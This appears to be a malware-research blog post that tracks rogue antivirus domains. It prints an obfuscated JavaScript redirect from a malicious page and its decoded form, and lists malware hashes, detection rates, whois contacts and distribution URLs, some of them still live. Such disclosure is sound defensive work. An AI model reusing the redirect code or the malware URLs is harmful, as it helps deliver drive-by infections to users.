Here we are with another rogue domain. This is on the same IP as from one I posted before here and here.
/promo1/ Fake Adult-archive.net website
/promo2/ Fake porntube.com website
/promo3/ Fake scanning page
/promo4/ Fake sextube website
Whois entry for antivir-soft.com 78.129.166.166
Plitochnik Ltd
Big Lebowski whitemarik@gmail.com
84522450091 fax: 84522450091
Mira str. 12
Kiev Kiev 375463
ua
Yet another domain associated with the string of blackhat seo operations using macrosoftwarego.com. In my previous posts #1 and #2.
On the page reached from the search results have a javascript routine of the following.
var str=["762", "777", "770", "759", "776", "765", "771", "770", "692", "743",
"761", "770", "760", "737", "781", "700", "773", "777", "761", "774", "781", "701",
"783", "670", "692", "779", "765", "770", "760", "771", "779", "706", "768", "771",
"759", "757", "776", "765", "771", "770", "721", "699", "764", "776", "776", "772",
"718", "707", "707", "759", "757", "768", "768", "771", "779", "755", "769", "771",
"770", "776", "774", "761", "757", "768", "711", "711", "706", "757", "762", "765",
"774", "775", "776", "760", "765", "758", "775", "706", "759", "771", "769", "707",
"765", "770", "760", "761", "780", "706", "764", "776", "769", "768", "723", "742",
"761", "762", "721", "699", "703", "761", "770", "759", "771", "760", "761", "745",
"742", "733", "727", "771", "769", "772", "771", "770", "761", "770", "776", "700",
"760", "771", "759", "777", "769", "761", "770", "776", "706", "774", "761", "762",
"761", "774", "774", "761", "774", "701", "719", "670", "785"];
var temp=”;
var gg=”;
for (i=0; i<str.length; i++){
gg=str[i]-660;
temp=temp+String.fromCharCode(gg);
}
eval(temp);
DECODES TO:
function SendMy(query){
window.location=’http://callow_montreal33.afirstdibs.com/index.html?
Ref=’+encodeURIComponent(document.referrer);
}
If the referrer is from certain search engines, you will then be redirected on to the macrosoftwarego.com and then on to the appropriate rogue anti-malware website for a drive-by download.
Whois entry for afirstdibs.com 84.16.229.43
Smith
Kevin L (KevinLSmith@text2re.com)
3924 Chathamway
Washington
Gansu,20200
CN
Tel. +240.5484495
Rogue domain found today. The domain does not resolve at the moment but I’m sure it will be soon. This was just registered as well. I will update this post as more information is available.
Whois entry for pcoutsecurity.com
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
P.O. Box 97
Note – All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676
Here are some files added to our database over the last couple of days.
WARNING: URL’s may still be active. Proceed at your own risk!
sophialite.exe
Result: 23/40 (57.5%)
MD5: 738c50d43ed4154edac1ea5796ab8b1d
VirusTotal
ThreatExpert Analysis
hxxp://direct-certs.bankofamerica.com.fwdidstr.com/direct/certupdate/update.aspx/
sdra64.exe
Result: 15/40 (37.5%)
MD5: 3bb0e2a070121c09453c49a2e6121648
VirusTotal
ThreatExpert Analysis
load.exe
Result: 0/40 (0%)
MD5: 52e5d2f6dbaf618f5c91e97cd9d810d6
VirusTotal
ThreatExpert Analysis
hxxp://s76z.cn/data/exe.php
sun.exe or owner.exe
Result: 13/40 (32.5%)
MD5: 39255093f4553bd68dff8441218abfa3
VirusTotal
ThreatExpert Analysis
hxxp://r99u.cn/myl/exe/
netsik.sys
Result: 22/40 (55%)
MD5: 94e70936cea0f3fa053b914a5bf0c311
VirusTotal
ThreatExpert Analysis
loader.exe or owner.exe
Result: 9/40 (22.5%)
MD5: b5b4188090683c97eb33394e4fd2ee60
VirusTotal
ThreatExpert Analysis
hxxp://r99u.cn/myl/exe/
ati64si.sys
Result: 18/40 (45%)
MD5: 9f273ad2316e9c9a722e9a6d8bf485b8
VirusTotal
ThreatExpert Analysis
calc.ifo
Result: 4/40 (10%)
MD5: a87bae24bce1beee32ac5a51ab9b5cb4
VirusTotal
VideoCodec.exe
Result: 8/40 (20%)
MD5: bb5b6f4a8a508ff1a2b0d6c467226a66
VirusTotal
ThreatExpert Analysis
hxxp://aofexo.com/download/3575375651673d3dfe4e941820090516/
BlueRaTech.exe
Result: 5/39 (12.83%)
MD5: 5470a99a1d3ca57babf7b472b40a8fbb
VirusTotal
ThreatExpert Analysis
softwarefortubeview.42002.exe
Result: 10/40 (25%)
MD5: f4814122cad0e19115182c5805313c13
VirusTotal
ThreatExpert Analysis
hxxp://exe-soft-development.com/
3388.exe or 216.jpg or msa.exe
Result: 6/40 (15%)
MD5: 32a1b6b307c426cb5ccfd0fa9fdab028
VirusTotal
ThreatExpert Analysis
hxxp://picturephotoweb.com/werber/84e29000321/
11388.exe or file.exe
Result: 29/40 (72.5%)
MD5: 1918d01a239cf69b4e339bcdb5deb383
VirusTotal
ThreatExpert Analysis
http://streaming-united.com/
5930.exe or perce.jpg
Result: 6/40 (15%)
MD5: f8400e21dff1061cf49cf39adf1c23ec
VirusTotal
ThreatExpert Analysis
hxxp://imageempires.com/perce/f52ce20214aada6b1d54d1bd681ced79e8cff050ebc2c0c49e59c830600999682e8c6f382442a74e9/74f2f090d27/
6080.exe or item.gif
Result: 7/40 (17.5%)
MD5: 7f5cf13888ea50644455ac63befa2f1c
VirusTotal
ThreatExpert Analysis
hxxp://theimagesstudio.com/item/85ac72d2843a9a5bddf4110d682cadc9482f30805b7220941ea98810306989b81efc9fa83432f71e2/14229030c25/
msxml71.dll
Result: 3/40 (7.5%)
MD5: 7bce14ecbe6988abd2171adef4640c5a
VirusTotal
ThreatExpert Analysis
d373f.pdf
Result: 14/39 (35.9%)
MD5: 6a04a9b5b81a18520b15b0f83013bb2c
VirusTotal
Wepawet Analysis
hxxp://fastinate.com/image/pfre.php
daa.exe or install.exe or sysguard.exe
Result: 20/39 (51.28%)
MD5: 0c4bb8ffba3360547d963a0d86d224f8
VirusTotal
ThreatExpert Analysis
hxxp://fastinate.com/image/ouet.php
avplay.exe
Result: 12/38 (31.58%)
MD5: 3cbd350dc2ec7d13ddcb2170796c2da9
VirusTotal
ThreatExpert Analysis
hxxp://122.224.4.133:30100/
iesuper.exe
Result: 10/40 (25%)
MD5: 96b7c8e08aff36600308467eb16cf478
VirusTotal
ThreatExpert Analysis
all.exe
Result: 10/40 (25%)
MD5: a9f38aee755868dad97fb5d92a8fafb3
VirusTotal
ThreatExpert Analysis
sethome.exe
Result: 20/39 (51.29%)
MD5: d715a861403b9a069494f56b8d807683
VirusTotal
ThreatExpert Analysis
